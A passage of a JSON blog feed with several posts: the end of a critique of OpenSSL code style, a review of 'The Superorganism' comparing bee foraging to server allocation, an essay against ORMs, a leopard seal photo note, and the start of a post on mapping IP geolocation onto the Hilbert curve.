#6F42C1;\">sk_X509_NAME_find<\/span><span>(sk,xn)<\/span><span style=\"color: #D73A49;\"> &gt;=<\/span><span style=\"color: #005CC5;\"> 0<\/span><span>)<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #6F42C1;\">            X509_NAME_free<\/span><span>(xn);<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">        else<\/span><\/span>\n<span class=\"giallo-l\"><span>            {<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #6F42C1;\">            sk_X509_NAME_push<\/span><span>(sk,xn);<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #6F42C1;\">            sk_X509_NAME_push<\/span><span>(ret,xn);<\/span><\/span>\n<span class=\"giallo-l\"><span>            }<\/span><\/span>\n<span class=\"giallo-l\"><span>        }<\/span><\/span>\n<span class=\"giallo-l\"><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">    if<\/span><span> (<\/span><span style=\"color: #005CC5;\">0<\/span><span>)<\/span><\/span>\n<span class=\"giallo-l\"><span>        {<\/span><\/span>\n<span class=\"giallo-l\"><span>err:<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">        if<\/span><span> (ret <\/span><span style=\"color: #D73A49;\">!=<\/span><span style=\"color: #005CC5;\"> NULL<\/span><span>)<\/span><span style=\"color: #6F42C1;\"> sk_X509_NAME_pop_free<\/span><span>(ret,X509_NAME_free);<\/span><\/span>\n<span class=\"giallo-l\"><span>        ret<\/span><span style=\"color: #D73A49;\">=<\/span><span style=\"color: #005CC5;\">NULL<\/span><span>;<\/span><\/span>\n<span class=\"giallo-l\"><span>        }<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">    if<\/span><span> (sk <\/span><span style=\"color: #D73A49;\">!=<\/span><span style=\"color: #005CC5;\"> NULL<\/span><span>)<\/span><span style=\"color: #6F42C1;\"> sk_X509_NAME_free<\/span><span>(sk);<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">    if<\/span><span> (in <\/span><span style=\"color: #D73A49;\">!=<\/span><span style=\"color: #005CC5;\"> NULL<\/span><span>)<\/span><span style=\"color: #6F42C1;\"> BIO_free<\/span><span>(in);<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">    if<\/span><span> (x <\/span><span style=\"color: #D73A49;\">!=<\/span><span style=\"color: #005CC5;\"> NULL<\/span><span>)<\/span><span style=\"color: #6F42C1;\"> X509_free<\/span><span>(x);<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">    if<\/span><span> (ret <\/span><span style=\"color: #D73A49;\">!=<\/span><span style=\"color: #005CC5;\"> NULL<\/span><span>)<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #6F42C1;\">        ERR_clear_error<\/span><span>();<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">    return<\/span><span>(ret);<\/span><\/span>\n<span class=\"giallo-l\"><span>    }<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">#endif<\/span><\/span><\/code><\/pre>\n<p>His objections boil down to the following:<\/p>\n<ul>\n<li>The indentation style is weird, and in many circumstances hard to parse.<\/li>\n<li>The project uses a mixture of CamelCase and underscore-based function naming.<\/li>\n<li>The error cleanup strategy is bizarre - using a goto to jump into code\nguarded by an \"if(0)\" is distinctly unlovely.<\/li>\n<li>In this example, the function name mis-characterises what the function\nactually does. The somewhat shame-faced comment doesn't fix the problem, it\njust makes it funny.<\/li>\n<li>The project suffers from ifdef-itis.<\/li>\n<li>Most importantly, the code does not \"read\" well. In this case, we find\nmultiple levels of indirection, and no clear flow to the function.<\/li>\n<\/ul>\n<p>So, while Marco's problem <em>started<\/em> with the project's shoddy documentation and\nAPI, his actual code criticism focuses on issues that are apparently\nsuperficial. He hasn't discovered a substantive bug or architectural weakness in\nthe snippet above. Instead, what matters to him are simple virtues like\nconsistency, style, and readability. Marco is saying, in fact, that the OpenSSL\ncode sucks because it lacks superficial beauty. I couldn't agree with this\nposition more.<\/p>\n<p>I'm reminded of a recent blog post describing \"the perfect interview question\"\nfor programmers: ask them what bothered them most when reviewing other people's\ncode. The blogger argued that a response focusing on superficial code quality\nmeant that the interviewee was obviously not an \"architectural thinker\", and was\ntherefore a poor candidate. This is utter tripe. Good programmers know that a\nlack of superficial code quality and consistency is the <em>best<\/em> indicator of\ndeeper systemic problems in a project.  If you ever need a quick estimate of the\nquality of a codebase, this is what you should look at first. If you ever have\nto work on a project with poor code quality, fix the superficial issues first.\nUgly code will obscure deeper architectural issues, increase defect rates, make\ncode review hell, and make the project hard to refactor. This is advice so basic\nthat it usually does not need to be given - good coders understand the\nimportance of superficial beauty at such a deep instinctive level that they will\nfeel <em>compelled<\/em> to fix cleanliness and neatness issues before working on deeper\nproblems.<\/p>\n<p>Superficial beauty is not something that is discussed nearly enough in the Open\nSource world, so I'm going to don my flame-retardant poncho, and name some\nnames. In keeping with this post's starting point, I'm going to focus on\nprojects in C. Lets start with the ugly. The codebase for\n<a rel=\"external\" href=\"http:\/\/www.vim.org\/\">Vim<\/a>, a tool that I spend hours using every day, turns out\nto be a frightening and inscrutable thicket of #ifdefs. The Linux kernel is\nimmensely variable in quality - some of it is very good, some of it - especially\nless widely used drivers - is unspeakable. The <a rel=\"external\" href=\"http:\/\/www.mutt.org\/\">mutt<\/a>\ncodebase is pretty terrible, prominently featuring one of my pet bugaboos -\nmixing tabs and spaces, invisibly screwing up indentation depending on your\neditor configuration. The <a rel=\"external\" href=\"http:\/\/www.wireshark.org\/\">Wireshark<\/a> packet sniffer -\nanother project I use daily - is so bad that OpenBSD <a rel=\"external\" href=\"http:\/\/www.openbsd.org\/cgi-bin\/cvsweb\/ports\/net\/ethereal\/Attic\/Makefile?hideattic=0\">opted to\nremove<\/a>\nit from their ports tree rather than encourage their users to use it. Wireshark\nwins a special prize for over-commenting. They've clearly abandoned all hope of\ncommunicating their intentions through the code itself, degenerating instead to\nthings like this:<\/p>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"c\"><span class=\"giallo-l\"><span style=\"color: #6A737D;\">\/* Now bump the count. *\/<\/span><\/span>\n<span class=\"giallo-l\"><span>(<\/span><span style=\"color: #D73A49;\">*<\/span><span>argc)<\/span><span style=\"color: #D73A49;\">++<\/span><span>;<\/span><\/span><\/code><\/pre>\n<p>I'll end the post on a high note, with some examples of great code quality.\nOpenBSD is undoubtedly one of the pin-up projects of the Open Source world,\nfeaturing code that is almost supernaturally clean, consistent and direct. If\nyou're interested in taking a look, I recommend starting with some of their\nrecent daemon development - their\n<a rel=\"external\" href=\"http:\/\/www.openbsd.org\/cgi-bin\/cvsweb\/src\/usr.sbin\/smtpd\/?sortby=date#dirlist\">SMTP<\/a>\nand <a rel=\"external\" href=\"http:\/\/www.openbsd.org\/cgi-bin\/cvsweb\/src\/usr.sbin\/ntpd\/?sortby=date\">NTP<\/a>\ndaemons are good candidates. Another excellent project to look at is the C\nPython interpreter, which shares many of OpenBSD's virtues. Note that I mean the\ninterpreter itself - the the standard library is unexpectedly variable in\nquality. A more obscure project with great code quality is the <a rel=\"external\" href=\"http:\/\/plan9.bell-labs.com\/sources\/plan9\/sys\/src\/\">Plan9 operating\nsystem<\/a>. Sadly, Plan9 never\ntook off (perhaps because it wasn't free software from the beginning), but the\ncodebase illustrates many of the sound principles outlined in by Kernighan and\nPike - both of whom were involved in Plan9 - in <a\nhref=\"https:\/\/www.amazon.com\/Practice-Programming-Addison-Wesley-Professional-Computing\/dp\/020161586X\">The\nPractice of Programming<\/a>.<\/p>\n<p><strong>edit:<\/strong> Meanwhile, over on\n<a rel=\"external\" href=\"http:\/\/www.reddit.com\/r\/programming\/comments\/a0s6o\/in_praise_of_superficial_beauty_a_followup_to\/\">reddit<\/a>\ndagbrown has pointed out\n<a rel=\"external\" href=\"http:\/\/opensource.apple.com\/source\/procmail\/procmail-1.2\/procmail\/src\/procmail.c\">procmail<\/a>,\nwhich turns out to be an absolutely unparalleled phenomenon. Go on, have a look - I dare ya.<\/p>\n"},{"title":"Non-programming books for Programmers: The Superorganism, H\u00f6lldobler & Wilson","published":"2009-10-25T00:00:00+00:00","updated":"2009-10-25T00:00:00+00:00","link":{"@attributes":{"href":"https:\/\/corte.si\/posts\/books\/superorganism\/","type":"text\/html"}},"id":"https:\/\/corte.si\/posts\/books\/superorganism\/","content":"<div class=\"media\">\n    <a href=\"https:&#x2F;&#x2F;www.amazon.com&#x2F;Superorganism-Beauty-Elegance-Strangeness-Societies&#x2F;dp&#x2F;0393067041&#x2F;ref=sr_1_1?dchild=1&amp;keywords=superorganism&amp;qid=1592693625&amp;s=books&amp;sr=1-1\">\n        <img src=\"superorganism-cover.jpg\"  \/>\n    <\/a>\n\n    \n    <div class=\"subtitle\">\n        Superorganism\n    <\/div>\n    \n<\/div>\n<p>It's impossible to talk about <em>The Superorganism<\/em> without first mentioning <a rel=\"external\" href=\"http:\/\/en.wikipedia.org\/wiki\/Bert_Holldobler\">Bert\nH\u00f6lldobler<\/a> and <a rel=\"external\" href=\"http:\/\/en.wikipedia.org\/wiki\/E._O._Wilson\">E. O.\nWilson<\/a>'s most famous collaboration -\na book called simply <em>The Ants<\/em>. I've been fascinated with ants since childhood,\nand <em>The Ants<\/em> is one of my favourite books - deep enough to be intellectually\nsatisfying on almost any detail, and broad enough to be one of those rare books\nthat summarizes nearly everything to be said about its subject. It's hard to\navoid platitudes like \"authoritative\" and \"magisterial\" when talking about a\nbook like this, so I will resort to a simple computer science analogy: <em>The\nAnts<\/em> is to the study of ants what <em>The Art of Computer Programming<\/em> is to the\nstudy of algorithms. Only more so, because unlike Knuth, H\u00f6lldobler and Wilson\nactually completed their survey in 1990. It should be no surprise then, that I\nhad <em>The Superorganism<\/em> on pre-order as soon as I heard that H\u00f6lldobler and\nWilson were publishing their first new book in almost two decades. <em>The\nSuperorganism<\/em> expands on a theme that also lies at the heart of <em>The Ants<\/em> -\nthe workings of insect societies. <em>The Superorganism<\/em> paints with a broader\nbrush than its predecessor, touching frequently on the other great families of\neusocial insects - termites, bees and wasps.<\/p>\n<div class=\"media\">\n    <a href=\"atta_cephalotes.jpg\">\n        <img src=\"atta_cephalotes.jpg\"  \/>\n    <\/a>\n\n    \n    <div class=\"subtitle\">\n        Atta cephalotes, Costa Rica\n    <\/div>\n    \n<\/div>\n<p>If you haven't delved into the world of social insects before, you're in for a\ntreat. The range and complexity of social insect behaviour can be weirder and\nmore wonderful than anything found in science fiction. Consider, for example,\nthe lives of what the authors call the \"ultimate superorganism\": the\n<a rel=\"external\" href=\"http:\/\/en.wikipedia.org\/wiki\/Attini\">Attine<\/a> leafcutter ants. The remarkable\nfact about the leafcutters is that they are farmers, cultivating vast fungal\ngardens that provide them with essential nutrients.  These fungal gardens are\ngrown on a substrate of leaf-matter, and leafcutters get their name from the\nfact that colonies cut up enormous quantities of leaves to transport back to\ntheir nests - one mature colony was estimated to harvest a leaf area of 4550\nsquare meters per year. The fungus gardens are the lifeblood of the leafcutter\ncolony, and they are tended with endless patience and skill. Leaves brought back\nto the nest are snipped up, molded into pellets, and carefully planted with\nfungal hyphae taken from elsewhere in the garden. Workers patrol the fungal\ngardens ceaselessly, weeding out foreign fungal strains and other contaminants.\nThe ants secrete antibiotics that inhibit the growth of other fungi, and produce\ngrowth hormones that enhances the growth of their own strain. They wage an\nendless battle against <em>Escovopsis<\/em>, a parasitic species of fungus that\nspecialises in invading Attine leafcutter gardens.  Remarkably, an important\npart of their arsenal is a second symbiont: a bacterium that only occurs on the\ncuticle of leafcutter ants, which produces powerful antibiotics specific to the\nfungal pest. The ants grow these bacterial weapons on special patches of\ncuticle, modified specifically to house them. There is also a degree of\ncommunication between the ants and their garden fungus. Leafcutter ants are\nsensitive to the chemicals signals released by distressed fungus, and learn to\navoid food that harms their gardens. When a new queen leaves the nest to mate\nand establish a colony of her own, she carries a sample of the fungus from her\nparent colony in a cavity next to her oesophagus. Once she has found a likely\nnesting spot, she spits out the fungal sample, and tends the growing cultivar as\nclosely as she does her own offspring, feeding it with secreted fluid, while she\nherself subsists off her own bodyfat. Once the first brood of workers have been\nraised, the queen assumes her proper position as the egg-laying machine at the\ncenter of the colony, feeding on unfertilized eggs laid by her workers. If her\ncolony is successful, she will produce about 20 eggs a minute, 24 hours a day,\nresulting in between 150 and 200 million offspring during her life. The colony\ncan consist of several million ants at any one time. This population is housed\nin a colossal nest - one typical example had 1920 chambers with 238 fungus\ngardens.  To build it, the ants had to shift 40 tonnes of soil. The nest itself\nis designed to provide optimal ventilation and humidity for the fungal gardens,\nand is continually adjusted by the ants to achieve the right conditions.\nStretching out from the nest is a set of foraging tunnels that surface into a\nweb of trunk routes along which leaf material is brought back to the nest.\nTrunk routes are meticulously maintained, with \"road workers\" clearing debris\nand encroaching vegetation.  Within the ant population there are a range of\nphysical castes, each adapted to a specific set of jobs. The smallest workers\nmaintain and patrol the fungal gardens. The largest are gigantic supersoldiers\nthat specialise in deterring vertebrate predators. Underpinning all of this is a\nsophisticated chemical communication system, involving a huge array of\npheromones, and an incredibly sensitive sensory system. H\u00f6lldobler and Wilson\ncite research that shows that one milligram of the trail pheromone of <em>Atta\ntexana<\/em> is enough to lead a worker 60 times around the Earth.<\/p>\n<p>Ponder for a moment the immense behavioural complexity required to sustain a\nsophisticated insect civilization like this. There are an extraordinary number\nof behaviours that need to be optimized, many of which read like they are\nstraight from the pages of a programming competition. Foraging strategies need\nto be devised to efficiently discover food sources. Once a food source is\ndiscovered, its value needs to be estimated, and the right fraction of the\ncolony's labour pool needs to be allocated to exploit it. Throughput needs to be\noptimised by selecting the right leaf fragment size, while minimizing the\nsignificant energetic cost of cutting leaves up smaller than necessary. The cost\nof constructing and maintaining the web of trunk routes needs to be weighed\nagainst the efficiency benefits gained (it turns out that they can improve\nforaging speed tenfold). There are many, many other interesting sub-problems\nlike these, and the colony solves them all admirably. The entire system reminds\none of a super-complicated real-time strategy game, and we can be forgiven for\nsuspecting that there must be some hyper-intelligent controller micromanaging a\n<a rel=\"external\" href=\"http:\/\/starcraft.wikia.com\/wiki\/Zerg\">Zerg-like<\/a> expansion of the nest. Here,\nhowever, we come to perhaps the most remarkable fact about social insects: their\ncolonies are leaderless. There is no central strategist at all - their entire\nrange of sophisticated behaviour is emergent, arising from the aggregate actions\nof many small simple units with only local information. And yet, millions of\nants can act with such apparent coherence and purpose that biologists like\nH\u00f6lldobler and Wilson have started thinking of colonies as organisms in\nthemselves - \"superorganisms\" that compete, mate, and strive for survival.<\/p>\n<p>Humanity has not yet learned how to cross the chasm that separates the\nindividual ant from the superorganism. We've seen the early glimmers of\ntechnologically produced distributed systems - one thinks of things like the\nInternet, peer-to-peer networks, and maybe some nebulous social constructs like\n\"the blogosphere\". The fact is, however, that we are simply incapable of\ndesigning distributed systems that even begin to approach the robustness and\nintricacy of insect colonies. $!superorg!$ is certainly not a manual for\napplying insectiod principles of distributed engineering to technological\nproblems. It is, however, the best available overview of the best distributed\nsystems we know of, and for that reason alone should be on every intellectually\ncurious computer scientist's bookshelf.<\/p>\n<h2 id=\"bees-resource-allocation-peer-to-peer-communication-and-tiered-architectures\">Bees: resource allocation, peer-to-peer communication and tiered architectures<\/h2>\n<div class=\"media\">\n    <a href=\"waggle-dance.jpg\">\n        <img src=\"waggle-dance.jpg\"  \/>\n    <\/a>\n\n    \n    <div class=\"subtitle\">\n        The essential form of the honeybee waggle dance, p. 170 of The Superorganism. Reproduced here with the kind permission of its creator, <a href='http:\/\/www.margynelson.com\/RumfordGraphics-Front-Page.html'>Margaret Nelson<\/a>\n    <\/div>\n    \n<\/div>\n<p>That's all very exciting, but it's not very concrete. So, for the second part of\nthis review, I'll look at one example of distributed problem solving covered in\n$!superorg!$, and explore its fascinating parallels with computer science.<\/p>\n<p>The best-studied insect society is surely that of <em>Apis mellifera<\/em>, the\nhoneybee. In 1947 <a rel=\"external\" href=\"http:\/\/en.wikipedia.org\/wiki\/Karl_von_Frisch\">Karl von\nFrisch<\/a> famously decoded part of\nthe \"dance language\" of the honeybee, showing that the bee <a rel=\"external\" href=\"http:\/\/en.wikipedia.org\/wiki\/Waggle_dance\">waggle\ndance<\/a> was used to convey precise\ninformation about the distance, direction and quality of a food source to nearby\nbees. The amazing discovery that bees conveyed complex abstract notions of this\ntype to each other gave us an early insight into the wonder of social insect\ncommunication. Over the years since von Frisch's discovery, it has gradually\nemerged that the waggle dance is just one of a complex set of signals used to\nimplement a distributed resource allocation strategy inside the bee colony. The\nbees in a hive are loosely specialised into \"foragers\", who go out of the hive\nto gather food, and \"nectar processors\", who remain in the hive to receive\nnectar from incoming foragers for processing and storage. When a forager returns\nto the nest laden with pollen and nectar, it searches until it finds a free\nprocessor to accept its cargo. The first optimisation problem the hive faces is\nto balance these two populations of specialists, minimising the waiting time for\nforagers dropping off their cargos as well as idle time for processors waiting\nto accept them.  The second optimisation problem arises from the fact that the\nsupply of nectar sources is not constant - if a new grove of flowers in bloom is\ndiscovered, the hive has to divert resources to exploit it as quickly as\npossible, adjusting the number of foragers and processors to match. This is\ncomplicated by the fact that not all nectar sources are equal: some might be\nparticularly rich, and therefore require more foragers to exploit. A particular\nbee hive might be extracting nectar from a number of flower patches at the same\ntime, and foragers need to be allocated optimally, and continually re-balanced.\nRemarkably, the bee colony accomplishes these goals without any central\nco-ordination, using an entirely distributed algorithm. To see how they do this,\nwe need to flesh out the bee dance language somewhat.  H\u00f6lldobler and Wilson\ndescribe three basic bee dances:<\/p>\n<ul>\n<li><strong>Waggle dance<\/strong>: The famous dance discovered by von Frisch, which directs\nforager bees to a specific resource with precise information on the location\nand distance.<\/li>\n<li><strong>Shaking dance<\/strong>: Recruits more bees to foraging, sending them to the dance\nfloor to look for waggle dancers.<\/li>\n<li><strong>Tremble dance<\/strong>: Induces waggle dancers to stop dancing, and recruits bees\nto nectar processing.<\/li>\n<\/ul>\n<p>These dances are signals that provide the communications framework for the \"bee\nalgorithm\", sketched out by H\u00f6lldobler and Wilson in the following set of\ndecision rules:<\/p>\n<blockquote>\n<p>1 | Not enough nectar collectors in the field? If yes, and you also\nhave immediate knowledge of a producing flower patch, perform the\nwaggle dance.<\/p>\n<p>2 | Is the flower patch rich or the weather fine or the day early or\ndoes the colony need substantially more food? Perform the dance with\nappropriately greater vivacity and persistence.<\/p>\n<p>3 | Not enough active foragers to send into the field? Perform the\nshaking maneuver.<\/p>\n<p>4 | Not enough nectar processors in the hive to handle the nectar\ninflow? Perform the tremble dance.<\/p>\n<\/blockquote>\n<p>So, how do bees decide if there are too many foragers or too many nectar\nprocessors, using purely local information? The answer is simple and elegant: if\na returning forager experiences a wait time of 20 seconds or less before finding\na nectar processor, they assume that there is a surplus of processors and\nrecruit more bees to foraging through the waggling dance. If they experience a\nwait time of 50 seconds or more, they assume that there are too many foragers,\nand use the tremble dance to both reduce the number foragers and increase the\nnumber of processors. Notice that all the signals used in this system are \"peer\nto peer\" - bees only communicate with nearby bees that are in the hive at the\nmoment of communication.<\/p>\n<p>The system described above is clear enough to implement easily, and there is a\nrich range of parallels with computer science. It's not surprising, therefore,\nthat a a bit of searching through the literature shows that a number of computer\nscientists have started mining the bee resource allocation algorithm for ideas.\nOne nice example comes from Sunil Nakrani and <a rel=\"external\" href=\"http:\/\/www2.isye.gatech.edu\/~ctovey\/\">Craig\nTovey<\/a>, who have successfully applied a\nsubset of the behaviour outlined above in a paper called <a rel=\"external\" href=\"http:\/\/www2.isye.gatech.edu\/~ctovey\/publications\/papers\/bee.oct19.2004.masi2.pdf\">On Honey Bees and\nDynamic Allocation in an Internet Server\nColony<\/a>.\nConsider a hypothetical data center of servers used to implement a hosted\napplication environment. Each application is backed by a dynamic pool of virtual\nservers, and servers can be added to or removed from the pools transparently.\nThere is, however, a switching cost to moving resources about - re-allocating a\nvirtual server involves server downtime and therefore lost revenue. Application\nload varies unpredictably - one day an application might be getting three hits a\nday, and the next it might crop up on Reddit and have a massive load spike. The\nhosting company is paid based on usage - say, per HTTP request served - and\nfaces the complex problem of optimally allocating its server resources to\nminimize downtime and maximize revenue. Nakrani and Tovey approach this problem\nby mapping the bee resource allocation system onto the server allocation\nproblem.  In this mapping, foraging bees are the servers, and flower patches are\nthe applications. In nature, the bee recruitment signal - the waggle dance\ndescribed above - is triggered if a flower patch is sufficiently \"profitable\".\nThe more profitable the nectar source, the greater the \"vivacity and\npersistence\" of the recruitment signal. Nakrani and Tovey simulated a system\nwhere servers used a central advertboard to post recruitment adverts. In broad\nterms, Nakrani and Tovey's servers were more likely to read a random advert from\nthe advertboard, and switch to a different application, when their current\napplication was less profitable. On the other hand, a server was more likely to\npost an advert to recruit more servers to its application, if its application\nwas more profitable. The result is a distributed algorithm that performs within\nabout 11.5% of an omniscient resource allocator with complete knowledge of all\nfuture HTTP requests.<\/p>\n<p>Interestingly, Nakrani and Tovey also had something to teach entomologists. They\nfound that while the bee recruitment algorithm performed superbly when there was\na lot of variability in application load, it was outperformed by much simpler\nalgorithms when load was relatively static. Their simulation therefore seems to\nindicate that the bee recruitment algorithm is an adaptation to variability in\nnectar sources. While this blog post focuses on what computer scientists can\nlearn from insects, the possibility that information might flow the other way is\na fascinating one. When I first read about the loose specialisation in the\nbeehive, with foragers handing over their load to processors, my immediate\nthought was that this described a tiered architecture. Now, there are a number\nof sound non-architectural reasons why a colony would want to have some bees\nspecialise in foraging. Foragers tend to be the older bees in the colony, and\nthis makes complete sense. Foraging is a hazardous activity, and bees have a\nlimited lifespan. Sending out bees that are approaching the end of their lives\nanyway is good economics. H\u00f6lldobler and Wilson write that this specialisation<\/p>\n<blockquote>\n<p>... causes a problem for the honeybee colony: How can the rate of food\ncollection, particularly of nectar, and the rate of food processing be kept\nin balance?<\/p>\n<\/blockquote>\n<p>The computer scientist in me suspects that there may be a different way to look\nat this aspect of bee behaviour. In computing we produce tiered architectures\nwith independent layers because they <em>improve<\/em> efficiency and flexibility in\nvarious ways. I can't help but wonder if a similar benefit might support this\naspect of bee behaviour.<\/p>\n<h2 id=\"postscript\">Postscript<\/h2>\n<p>One last note before I'm done. Karl von Frisch once said that<\/p>\n<blockquote>\n<p>... the life of bees is like a magic well. The more you draw from it, the\nmore there is to draw.<\/p>\n<\/blockquote>\n<p>There are some 20,000 species of bee in the world, ranging from solitary species\nto the great super-societies of domestic honeybees. There are 14,000 species of\nants, 4,000 species of termite, and more than 100,000 species of wasp. Each of\nthese species is a unique product of evolution's boundless ingenuity, and each\nhas its own suite of solutions to the problems of survival. When one of these\nspecies disappears - and they are doing so at a terrifying rate - the tragedy is\nnot simply that something beautiful is irretrievably gone from the world, but\nalso that we have lost another irreplaceable magic well to study, learn from,\nand emulate.  E. O. Wilson has devoted much of the latter years of his life to\nthe great cause of preserving our biological legacy - if you are interested in\nthis urgent issue (and you should be) I recommend his 2002 book <a rel=\"external\" href=\"https:\/\/www.amazon.com\/Future-Life-Edward-Wilson\/dp\/0679768114\">The Future of\nLife<\/a> .<\/p>\n"},{"title":"A Farewell to ORMs","published":"2009-10-12T00:00:00+00:00","updated":"2009-10-12T00:00:00+00:00","link":{"@attributes":{"href":"https:\/\/corte.si\/posts\/code\/farewell-to-orms\/","type":"text\/html"}},"id":"https:\/\/corte.si\/posts\/code\/farewell-to-orms\/","content":"<p>j I've been using ORMs for years, starting with my own hand-hacked library back\nin the days before there were good ORMs for Python, and more recently settling\ninto a comfortable reliance on <a rel=\"external\" href=\"http:\/\/www.sqlalchemy.org\/\">SQLAlchemy<\/a>. Over\ntime, though, my initially rosy feelings towards ORMs have begun to sour. I\ngradually realised I was spending a disproportionate amount of time trying to\ncoax the ORM into doing my bidding - and when I succeeded, the results were\noften ugly, slow and needlessly opaque.  Analysing the performance of some of\nthe more complicated portions of my data access layer was often painful, and I\nspent cumulative hours poring over generated SQL, trying to figure out what the\nORM was doing and why. Usually, improving performance involved side-stepping the\nORM altogether. Recently, a particularly gnarly performance issue prompted me to\nditch the ORM from a project altogether, with surprisingly pleasant results.<\/p>\n<h2 id=\"impedance-mismatch\">Impedance mismatch<\/h2>\n<p>Ask any programmer why they use an ORM, and the answer is likely to be\n\"impedance mismatch\". This is a lovely phrase from a rhetorical point of view -\nhovering at the edge of meaning, but nicely avoiding asserting anything that can\nactually be quantified. The usual hand-wave is that impedance mismatch arises\nfrom the tension between table-oriented relational data, and object oriented\nconceptual thinking. Your Bicycle class - a subclass, naturally, of Vehicle -\nmight have to be reconstructed from data scattered across six different tables,\nand it's a distressing possibility that none of those tables might be called\nBicycle, or indeed Vehicle. What we should aim for, the argument goes, is a\nprogrammer's Shangri-La where where we can transparently persist and restore our\nobjects and have the storage taken care of by some magical plumbing. Whether or\nnot the magical plumbing is worthwhile depends largely on how often the\nabstraction breaks down. The ORM approach does so frequently.  Yes, I can use an\nORM and think at the object level in the common case, but whenever I need to do\nanything remotely complicated - optimising a query, say - I'm back in the land\nof tables and foreign keys. In the end, the structure of data is something\nfundamental that can't be simplified or abstracted away. The ORM doesn't resolve\nthe impedance mismatch, it just postpones it.<\/p>\n<h2 id=\"a-lighter-abstraction\">A lighter abstraction<\/h2>\n<p>So, if ORMs are at best a very partial solution to the ill-defined impedance\nmismatch problem, why do so many programmers swear by them? It's not that\nthey're all fools, it's just that ORMs solve ANOTHER practical problem much more\nsuccessfully. Most programmers who use ORMs do so simply to avoid re-writing\nendless nearly identical CRUD operations for every persistable object in their\nproject.  This isn't about any fundamental object-relational impedance mismatch -\nit's simply a problem of query generation. So, this brings me to my own\ndifficult-to-quantify contribution to the miasma of fuzzy thinking that already\nsurrounds this issue: <strong>90% of the benefit most people derive from ORMs can be\ngained more simply and more transparently through unashamedly table-oriented\nquery generation<\/strong>. All we need is a nice programmatic way to generate and\nmanipulate SQL statements...  Luckily we have just such a tool in the SQLAlchemy\n<a rel=\"external\" href=\"http:\/\/www.sqlalchemy.org\/docs\/05\/sqlexpression.html\">SQLAlchemy SQL expression\nlanguage<\/a> - a good, simple\nand nearly complete language for working with SQL expressions from Python.<\/p>\n<p>Pursuing this line of thought, I've ditched the ORM from a few of my projects.\nInstead, I'm using a defter abstraction - a simple, lightweight framework that\nuses SQLAlchemy's SQL expression language to auto-generate most queries. This\nframework is unashamedly table-oriented, and exists to manipulate data at a\nrelational level. It clocks in at less than 150 lines of code. The database\nschema is no longer defined by the ORM - instead, helper objects are built\nthrough schema reflection. The result has been satisfying - my data layers are\nbetter encapsulated, database interaction is more transparent, and the\nconceptual complexity is much reduced. Since nothing happens magically behind\nthe scenes, it's easier to analyse performance, and since there is no session\nlayer (few projects really need one) a whole chunk of complexity has gone away.\nUsing reflection rather than defining the schema in code has made schema\nevolution much less of a chore. I also retain other benefits usually attributed\nto ORMs - the expression language abstracts away flavour differences between\ndatabases, so I can still, for example, run a large fraction of my unit tests\nagainst in-memory SQLite databases and deploy on PostgreSQL. I'm now gradually\nmigrating all my projects to this way of working.<\/p>\n"},{"title":"Leopard Seal at Sandfly Bay","published":"2009-09-09T00:00:00+00:00","updated":"2009-09-09T00:00:00+00:00","link":{"@attributes":{"href":"https:\/\/corte.si\/posts\/photos\/leopardseal\/","type":"text\/html"}},"id":"https:\/\/corte.si\/posts\/photos\/leopardseal\/","content":"<div class=\"media\">\n    <a href=\"leopardseal.jpg\">\n        <img src=\"leopardseal-small.jpg\"  \/>\n    <\/a>\n\n    \n    <div class=\"subtitle\">\n        Leopard Seal at Sandfly Bay\n    <\/div>\n    \n<\/div>\n<p>Took this shot on my morning walk, 15 minutes away from my home. We are usually\nthe only humans on this 1km beach, and we are often out-numbered 10-1 by sea\nlions. The photo is of a <a rel=\"external\" href=\"http:\/\/en.wikipedia.org\/wiki\/Leopard_Seal\">leopard\nseal<\/a> - a rarity in these parts.\nThese sleek top-predators bear as much resemblance to the portly and <a rel=\"external\" href=\"http:\/\/www.flickr.com\/photos\/8268815@N08\/3886175958\/\">rather\nridiculous<\/a> sea lions as a\nlabradoodle does to a wolf. This one was a juvenile - only about 2.5 meters long -\nbut still managed to exude a considerable amount of toothy menace.<\/p>\n"},{"title":"Visualising IP Geolocation","published":"2009-09-05T00:00:00+00:00","updated":"2009-09-05T00:00:00+00:00","link":{"@attributes":{"href":"https:\/\/corte.si\/posts\/code\/hilbert\/explorer\/","type":"text\/html"}},"id":"https:\/\/corte.si\/posts\/code\/hilbert\/explorer\/","content":"<style>\n    .jpexample img {\n        background: url(\/geohilbert\/ALL.png);\n    }\n<\/style>\n<div class=\"media jpexample\">\n    <a href=\"&#x2F;geohilbert&#x2F;JP.png\">\n        <img src=\"&#x2F;geohilbert&#x2F;JP.png\"  \/>\n    <\/a>\n\n    \n    <div class=\"subtitle\">\n        IP Addresses in Japan\n    <\/div>\n    \n<\/div>\n<p>I'm spending a fair bit of my time working on a project that uses an IP\ngeolocation database to map internet addresses to countries as part of a\nsecurity survey. There are a number of these location databases available, but\ncomparing their quality and coverage is not trivial, so selecting one to use is\nhard. I recently decided to spend a few hours looking at the problem, and got\nhopelessly side-tracked into visualising the databases using the Hilbert curve.\nThe result is the <a href=\"\/geohilbert\/index.html\">Hilbert Explorer<\/a>, a\nmapping of the geographical location of IP addresses onto the Hilbert Curve. You\nshould have a play with it before reading the rest of this post.<\/p>\n<h2 id=\"the-hilbert-curve-a-very-brief-introduction\">The Hilbert Curve - a (very) brief introduction<\/h2>\n<p>The <a href=\"http:\/\/en.wikipedia.org\/wiki\/Hilbert_curve\">Hilbert Curve<\/a> is a\nspace-filling <a href=\"http:\/\/mathworld.wolfram.com\/Curve.html\">curve<\/a> that\nis usually produced iteratively, with the N-th step in the iteration referred to\nas the \"order N\" curve.  Here are orders 1 to 